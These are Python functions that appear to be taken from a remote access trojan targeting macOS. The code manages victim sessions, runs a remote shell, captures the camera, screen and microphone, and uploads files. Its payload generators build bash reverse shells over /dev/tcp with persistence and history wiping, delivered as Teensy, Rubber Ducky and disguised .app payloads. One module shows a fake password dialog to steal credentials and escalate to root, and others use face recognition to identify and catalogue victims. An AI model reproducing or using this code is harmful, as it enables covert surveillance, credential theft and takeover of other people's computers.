def interact(self): h.info_general("Listening on port {0}...".format(self.server.port)) h.info_general("Type \"help\" for commands") while 1: try: input_data = raw_input(self.handle) if not input_data: continue cmd = input_data.split()[0] args = input_data[len(cmd):].strip() if cmd == "interact": self.interact_with_session(args) elif cmd == "close": self.close_session(args) elif cmd == "sessions": self.list_sessions() elif cmd == "help": self.show_commands() elif cmd == "exit": self.stop_server() return else: h.info_error("Invalid Command: " + cmd) except KeyboardInterrupt: sys.stdout.write("\n") self.stop_server() return
def run(self,session,cmd_data): if not cmd_data['args'] or (cmd_data['args'] != "front" and cmd_data['args'] != "back"): print self.usage return if cmd_data['args'] == "back": cmd_data['args'] = False else: cmd_data['args'] = True h.info_general("Taking picture...") try: response = json.loads(session.send_command(cmd_data)) if 'success' in response: size = int(response["size"]) if cmd_data['args'] == False: file_name = "back_{0}.jpg".format(int(time.time())) else: file_name = "front_{0}.jpg".format(int(time.time())) data = session.sock_receive_data(size) h.info_general("Saving {0}".format(file_name)) # save to file f = open(os.path.join('downloads',file_name),'w') f.write(data) f.close() h.info_general("Saved to ./downloads/{0}".format(file_name)) else: if 'error' in response: h.info_error(response['error']) else: h.info_error("Unexpected error") except Exception as e: print e
def upload_file(self, file_path, remote_dir, remote_file_name): term = binascii.hexlify(os.urandom(16)) if os.path.exists(file_path): f = open(file_path, "rb") data = f.read() size = len(data) name = os.path.split(file_path)[-1] cmd_data = json.dumps({ "cmd": "upload", "args": json.dumps({ "size": size, "path": remote_dir, "filename": remote_file_name }), "term": term }) self.sock_send(cmd_data) for i in range((size / 1024) + 1): deltax = i * 1024 chunk = data[deltax:deltax + 1024] self.sock_send(chunk) self.sock_send(term) else: h.info_error("Local file: " + file_path + " does not exist")
def show_session(self, session): try: print str(session.id) + " | " +\ session.username + "@" + session.hostname + " | " + \ str(session.conn.getpeername()[0]) except Exception as e: h.info_error(str(e))
def interact_with_session(self, session_number): if not session_number: print "Usage: interact (session number)" return try: self.sessions_id[int(session_number)].interact() except: h.info_error("Invalid Session")
def run(self,session,cmd_data): result = json.loads(session.send_command(cmd_data)) if 'error' in result: h.info_error(result['error']) elif 'current_directory' in result: session.current_directory = result['current_directory'].encode('utf-8') else: h.info_error('Unable to get current directory!')
def interact_with_session(self,session_number): if not session_number: print "Usage: interact <session>" return try: self.sessions_id[int(session_number)].interact() except: h.info_error("Session "+session_number+" is not found!")
def interact_with_session(self,session_number): if not session_number: print "Usage: Interact + [Session Number]" return try: self.sessions_id[int(session_number)].interact() except: h.info_error("Invalid Session Number. Please Put The Correct Session Number.")
def run(self,server): while 1: persistence = raw_input(h.info_question_raw("Make Persistent? (y/N): ")).lower() if persistence == "y": shell_command = "while true; do $(bash &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1); sleep 5; done & " break elif persistence == "n" or not persistence: shell_command = "bash &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1;" break else: h.info_error("Unrecognized option!") shell_command += "history -wc;killall Terminal" if os.path.exists("payloads") == False: os.mkdir("payloads") if os.path.exists("payloads/teensy_macos") == False: os.mkdir("payloads/teensy_macos") payload_save_path = "payloads/teensy_macos/teensy_macos.ino" payload = """\ #include "Keyboard.h" const int LED = 13; void setup() { pinMode(LED, OUTPUT); Serial.begin(9600); delay(1000); //delay to establish connection Keyboard.set_modifier(MODIFIERKEY_GUI); Keyboard.set_key1(KEY_SPACE); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); delay(200); Keyboard.print("terminal"); delay(1000); keyEnter(); delay(1000); Keyboard.print(\""""+shell_command+"""\"); keyEnter(); } void keyEnter() { Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); //release Keyboard.set_key1(0); Keyboard.send_now(); } void loop() { digitalWrite(LED, HIGH); delay(100); digitalWrite(LED, LOW); delay(100); }""" f = open(payload_save_path,"w") f.write(payload) f.close() h.info_general("Payload saved to " + payload_save_path)
def interact_with_session(self, session_number, cmd_data): if not session_number: print "Usage: interact (session number)" return None try: return self.sessions_id[int(session_number)].interact(cmd_data) except: h.info_error("Invalid Session") return None
def close_session(self, session_number): if not session_number: print "Usage: close <session_number>" return try: session = self.sessions_id[int(session_number)] session.disconnect(False) h.info_general('Closing session ' + session_number + '...') except: h.info_error("Invalid session number!")
def close_session(self,session_number): if not session_number: print "Usage: Terminate + [Session Number]" return try: session = self.sessions_id[int(session_number)] session.disconnect(False) h.info_general('Terminating Session ' + session_number) except Exception as e: print e h.info_error("Invalid Session Number. Please Put The Correct Session Number.")
def close_session(self, session_number): if not session_number: print "Usage: close (session number)" return try: session = self.sessions_id[int(session_number)] session.disconnect(False) h.info_general('Closing session ' + session_number) except Exception as e: print e h.info_error("Invalid Session")
def run(self, session, cmd_data): if cmd_data['args'] == "install": h.info_general("Installing...") elif cmd_data['args'] == "uninstall": h.info_general("Uninstalling...") else: print self.usage return result = session.send_command(cmd_data) if result: h.info_error(result)
def run(self, session, cmd_data): while 1: uid = session.send_command({"cmd": "echo", "args": "$UID"}) if uid[:-1] == "0": whoami = "# " else: whoami = "$ " shell = raw_input(h.ENDC + session.hostname + ":" + session.current_directory + " " + session.username + whoami) if not shell or shell.replace(" ", "") == "": continue shelld = shell.split()[0] shelld_data = {"cmd": shelld, "args": shell[len(shelld) + 1:]} if shelld == "cd": result = json.loads(session.send_command(shelld_data)) if 'error' in result: h.info_error(result['error']) elif 'current_directory' in result: session.current_directory = result[ 'current_directory'].encode('utf-8') else: h.info_error('Unable to get current directory!') if shelld == "ls": if not shelld_data['args']: shelld_data['args'] = '.' data = session.send_command(shelld_data) try: contents = json.loads(data) except: print data return keys = contents.keys() keys.sort() for k in keys: if contents[k] == 4 or contents[k] == 10: print h.COLOR_INFO + k + h.ENDC else: print k if shelld == "exit": return else: try: result = session.send_command(shelld_data) if result: if shelld == "ls" or shelld == "cd": pass else: print result.rstrip() except KeyboardInterrupt: session.send_command({"cmd": "killtask"})
def run(self, session, cmd_data): result = json.loads(session.send_command(cmd_data)) if 'error' in result: h.info_error(result['error']) return elif 'size' in result: size = int(result['size']) data = session.sock_receive_data(size) file_name = "screenshot_{0}.jpg".format(int(time.time())) h.info_general("Saving {0}".format(file_name)) f = open(os.path.join('downloads', file_name), 'wb') f.write(data) f.close() h.info_general("Saved to ./downloads/{0}".format(file_name))
def run(self,session,cmd_data): payload = """ tell application "Finder" activate set myprompt to "Type your password to allow System Preferences to make changes" set ans to "Cancel" repeat try set d_returns to display dialog myprompt default answer "" with hidden answer buttons {"Cancel", "OK"} default button "OK" with icon path to resource "FileVaultIcon.icns" in bundle "/System/Library/CoreServices/CoreTypes.bundle" set ans to button returned of d_returns set mypass to text returned of d_returns if mypass > "" then exit repeat end try end repeat try do shell script "echo " & quoted form of mypass end try end tell """ cmd_data.update({"cmd":"applescript","args":payload}) password = session.send_command(cmd_data).strip() #display response print h.COLOR_INFO+"[*] "+h.WHITE+"Response: "+h.GREEN+password+h.WHITE #prompt for root tryroot = raw_input("Would you like to try for root? (Y/n) ") tryroot = tryroot if tryroot else "y" if tryroot.lower() != "y": return "" #TODO: I am so lazy, probably should use the su command password = password.replace("\\","\\\\").replace("'","\\'") cmd_data.update({"cmd":"eggsu","args":password}) result = session.send_command(cmd_data) if "root" in result: h.info_general("Root Granted!") time.sleep(0.2) h.info_general("Escalating Privileges...") if session.server.is_multi == False: session.server.update_session(session) else: session.needs_refresh = True else: h.info_error("Failed getting root!") return ""
def identify_victim(self, session_id): if session_id < 1: h.info_error("Invalid Session") return False try: idx = session_id - 1 victim = self.victims['victims'][idx] # if already identified, return True if victim['identified']: return True file_name = self.sessions_id[session_id].init_interact() response = faceRec(file_name) response = json.loads(response) h.info_general("Face Rec Result:") print(response) if response['status'] == "Ok": print(response['faceId']) faceid = response['faceId'] if faceid in self.faceid_mapping['FaceToPerson']: person_name = self.faceid_mapping['FaceToPerson'][faceid] for person in self.person_db['Person']: if person['name'] == person_name: identified_victim = {} identified_victim['session_id'] = session_id identified_victim['profile'] = person self.identified_victims[ 'identified_victims'].append(identified_victim) self.identified_victims[ 'total_identified_victims'] += 1 break victim['identified'] = True return True else: print("Person not in Database") return False else: print("No Face Rec result") return False except: h.info_error("Person cannot be recognized") return False
def run(self, server): while 1: persistence = raw_input( h.info_question_raw("Make Persistent? (y/N): ")).lower() if persistence == "y": shell_command = "while true; do $(bash &> /dev/tcp/" + str( server.host) + "/" + str( server.port) + " 0>&1); sleep 5; done & " shell_clean = "history -wc;killall Terminal" break elif persistence == "n" or not persistence: shell_command = "bash &> /dev/tcp/" + str( server.host) + "/" + str(server.port) + " 0>&1;" shell_clean = "history -wc;killall Terminal" break else: h.info_error("Unrecognized option!") shell_command += "history -wc;killall Terminal" if os.path.exists("payloads") == False: os.mkdir("payloads") if os.path.exists("payloads/rubber_duck") == False: os.mkdir("payloads/rubber_duck") payload_save_path = "payloads/rubber_duck/payload.txt" payload = """\ DELAY 500 COMMAND SPACE DELAY 500 STRING terminal DELAY 500 ENTER DELAY 500 STRING """ + shell_command + """ DELAY 500 ENTER DELAY 500 """ f = open(payload_save_path, "w") f.write(payload) f.close() h.info_general("Payload saved to " + payload_save_path)
def run(self, server): while 1: name = raw_input(h.info_general_raw("Application Name> ")) icon = raw_input(h.info_general_raw("Application Icon> ")) persistence = raw_input( h.info_general_raw("Make Persistent? (y/N): ")).lower() if persistence == "y": shell_command = "while true; do $(bash &> /dev/tcp/" + str( server.host) + "/" + str( server.port) + " 0>&1); sleep 5; done & " break elif persistence == "n" or not persistence: shell_command = "bash &> /dev/tcp/" + str( server.host) + "/" + str(server.port) + " 0>&1;" break else: h.info_error("invalid option: " + persistence) if os.path.exists("payloads") == False: os.mkdir("payloads") if os.path.exists("payloads/macos_application") == False: os.mkdir("payloads/macos_application") os.system(""" cp -r resources/payload.app payloads/macos_application mv payloads/macos_application/payload.app payloads/macos_application/""" + name + """.app mv """ + icon + """ payloads/macos_application/""" + name + """.app/Contents/Resources/payload.icns """) payload_save_path = "payloads/macos_application/" + name + ".app/Contents/MacOS/payload.sh" sas = "payloads/macos_application/" + name + ".app" payload = """\ #! /usr/bin/env bash """ + shell_command + """ """ f = open(payload_save_path, "w") f.write(payload) f.close() h.info_general("Payload saved to " + sas) os.system("chmod +x payloads/macos_application/" + name + ".app/Contents/MacOS/payload.sh")
def run(self, session, cmd_data): # #print(output ) if cmd_data["args"] == "stop": # expect json result = json.loads(session.send_command(cmd_data)) if 'error' in result: h.info_error("Error: " + result['error']) elif 'status' in result and result['status'] == 1: # download file data = session.download_file("/tmp/.avatmp") file_name = "mic{0}.caf".format(str(int(time.time()))) h.info_general("Saving {0}".format(file_name)) f = open(os.path.join('downloads', file_name), 'wb') f.write(data) f.close() h.info_general("Saved to ./downloads/{0}".format(file_name)) elif cmd_data["args"] == "record": h.info_general(session.send_command(cmd_data)) else: print("Usage: mic record/stop")
def init_interact_with_session(self): if self.new_session_id < 1: print "Usage: interact (session number)" return try: file_name = self.sessions_id[self.new_session_id].init_interact() response = faceRec(file_name) response = json.loads(response) if response['status'] == "Ok": print(response['faceId']) faceid = response['faceId'] else: print("no data match") faceid = "" # faceid = "faceid1" if faceid in self.faceid_mapping['FaceToPerson']: person_name = self.faceid_mapping['FaceToPerson'][faceid] for person in self.person_db['Person']: if person['name'] == person_name: self.victims[self.new_session_id] = person self.victims_modify = True except: h.info_error("Invalid Session")
def save_images(self, session_id, filename): if session_id < 1: h.info_error("Invalid Session") return try: idx = session_id - 1 victim = self.victims['victims'][idx] # Only save the image for identified victim if not victim['identified']: h.info_general("Session has not been identified") return victim_name = None identified_victims = self.identified_victims['identified_victims'] for victim in identified_victims: if victim['session_id'] == session_id: victim_name = victim['profile']['name'] break # Had found the victim, save the image in personal db if victim_name: try: image_path = "./DB/pictures/" + filename personal_db_image_path = "./DB/" + victim_name + "/Images/" if not os.path.exists(personal_db_image_path): os.makedirs(personal_db_image_path) image = Image.open(image_path) image.save(personal_db_image_path + filename, optimize=True, quality=10) h.info_general("Saved to" + personal_db_image_path + filename) return except: h.info_error("Image save path error") return else: h.info_general("Haven't found the target victim") return except: h.info_error("Error in Saving the image") return
def get_all_images(self, victim_name): if not victim_name: h.info_error("Invalid victim name") return None try: try: victim_db_path = "./DB/" victims_folders = os.listdir(victim_db_path) if victim_name not in victims_folders: h.info_general("Unidentified victim") return None except: return None # Had found the victim folder, get all image files if victim_name: try: personal_db_image_path = "DB/" + victim_name + "/Images/" if not os.path.exists(personal_db_image_path): os.makedirs(personal_db_image_path) images = [ f for f in os.listdir(personal_db_image_path) if f.endswith('.jpg') ] total_images = len(images) results = {} results['images'] = images results['total_images'] = total_images results['image_path'] = personal_db_image_path return results except: h.info_error("Fetching Images Error") return None else: h.info_general("Invalid victim name") return None except: h.info_error("Error in get the images") return None